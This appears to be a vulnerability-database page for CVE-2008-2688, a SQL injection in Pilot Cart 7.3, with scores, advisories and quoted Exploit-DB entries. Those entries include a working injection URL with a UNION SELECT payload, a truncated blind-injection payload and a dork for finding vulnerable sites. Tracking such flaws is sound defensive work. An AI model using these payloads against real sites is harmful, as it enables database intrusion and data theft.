CVE-2008-2688
published 2008-06-13CVE-2008-2688: SQL injection vulnerability in pilot.asp in ASPilot Pilot Cart 7.3 allows remote attackers to execute arbitrary SQL commands via the article parameter in a kb…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
SQL injection vulnerability in pilot.asp in ASPilot Pilot Cart 7.3 allows remote attackers to execute arbitrary SQL commands via the article parameter in a kb action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pilotcart | pilot_cart | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fj3j-c3hf-8gqj: Multiple SQL injection vulnerabilities in ASPilot Pilot Cart 7
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2010-4632 [HIGH] CWE-89 GHSA-fj3j-c3hf-8gqj: Multiple SQL injection vulnerabilities in ASPilot Pilot Cart 7
Multiple SQL injection vulnerabilities in ASPilot Pilot Cart 7.3 allow remote attackers to execute arbitrary SQL commands via the (1) article parameter to kb.asp, (2) specific parameter to cart.asp, (3) countrycode parameter to contact.asp, and the (4) srch parameter to search.asp. NOTE: the article parameter to pilot.asp is already covered by CVE-2008-2688.
GHSA
GHSA-5582-39pc-mhm8: SQL injection vulnerability in pilot
ghsa_unreviewed·2022-05-01
CVE-2008-2688 [HIGH] CWE-89 GHSA-5582-39pc-mhm8: SQL injection vulnerability in pilot
SQL injection vulnerability in pilot.asp in ASPilot Pilot Cart 7.3 allows remote attackers to execute arbitrary SQL commands via the article parameter in a kb action.
No detection rules found.
Exploit-DB
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
exploitdb·2010-11-07·CVSS 7.5
CVE-2010-4632 [HIGH] ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# version last 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
ASPilot Pilot Cart 7.3 - 'article' SQL Injection
exploitdb·2008-06-09
CVE-2008-2688 ASPilot Pilot Cart 7.3 - 'article' SQL Injection
ASPilot Pilot Cart 7.3 - 'article' SQL Injection
---
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
[+] Script Name : Pilot Cart 7.3 Remote SQL Injection Exploit
|+| Team : injEct0r5
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
[+] Script URL : www.pilotcart.com
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
--//-->
[+] Expl0iT :
pilot.asp?pg=kb&article={SQL}
{SQL} --> 115+union+select+Name,Name,Name+from+msysobjects
Or blind it :
{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(sele
No writeups or analysis indexed.
http://secunia.com/advisories/30176http://www.securityfocus.com/bid/29615https://exchange.xforce.ibmcloud.com/vulnerabilities/42946https://www.exploit-db.com/exploits/5765http://secunia.com/advisories/30176http://www.securityfocus.com/bid/29615https://exchange.xforce.ibmcloud.com/vulnerabilities/42946https://www.exploit-db.com/exploits/5765
2008-06-13
Published